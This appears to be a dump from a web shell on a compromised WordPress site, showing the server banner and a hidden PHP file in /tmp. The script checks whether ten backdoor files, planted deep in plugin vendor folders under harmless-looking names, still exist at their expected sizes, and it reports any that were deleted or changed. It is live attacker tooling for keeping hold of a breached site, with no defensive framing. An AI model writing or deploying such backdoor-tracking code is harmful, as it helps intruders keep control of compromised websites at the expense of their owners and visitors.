HEX
Server: Apache/2.4.62 (Ubuntu)
System: Linux smartkeyWeb 6.11.0-29-generic #29-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:29:41 UTC 2025 x86_64
User: www-data (33)
PHP: 8.3.11
Disabled: NONE
Upload Files
File: //tmp/.descriptor
<?php   $r = '/var/www/html/thesmartkeyrealty.com'; $x = ["/wp-content/plugins/tablepress/libraries/vendor/PhpSpreadsheet/Calculation/locale/pt/br/usergroup_10.php"=>"bd@@60944@@910",
"/wp-content/plugins/tablepress/libraries/vendor/PhpSpreadsheet/Calculation/locale/it/foitisi_buttons.php"=>"bd@@80657@@1072",
"/wp-content/plugins/fast-indexing-api/vendor/google/apiclient/src/Task/Xml.php"=>"bd@@80936@@864",
"/wp-content/plugins/tablepress/libraries/vendor/PhpSpreadsheet/Calculation/locale/da/testmail.php"=>"bd@@60986@@980",
"/wp-content/plugins/wordpress-seo/images/progress.php"=>"bd@@55891@@973",
"/wp-content/plugins/tablepress/libraries/vendor/PhpSpreadsheet/Calculation/locale/fi/editcustrepfld.php"=>"bd@@61030@@937",
"/wp-content/plugins/tablepress/libraries/vendor/PhpSpreadsheet/Reader/Security/wlp.php"=>"bd@@80751@@1033",
"/wp-content/plugins/fast-indexing-api/vendor/google/apiclient/src/Utils/toolbar.contact.php"=>"bd@@81009@@1036",
"/wp-content/plugins/fast-indexing-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/popup_edit_label.php"=>"bd@@61064@@930",
"/wp-content/plugins/fast-indexing-api/vendor/phpseclib/phpseclib/phpseclib/Math/BinaryField/RenameFile.php"=>"bd@@61088@@862"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');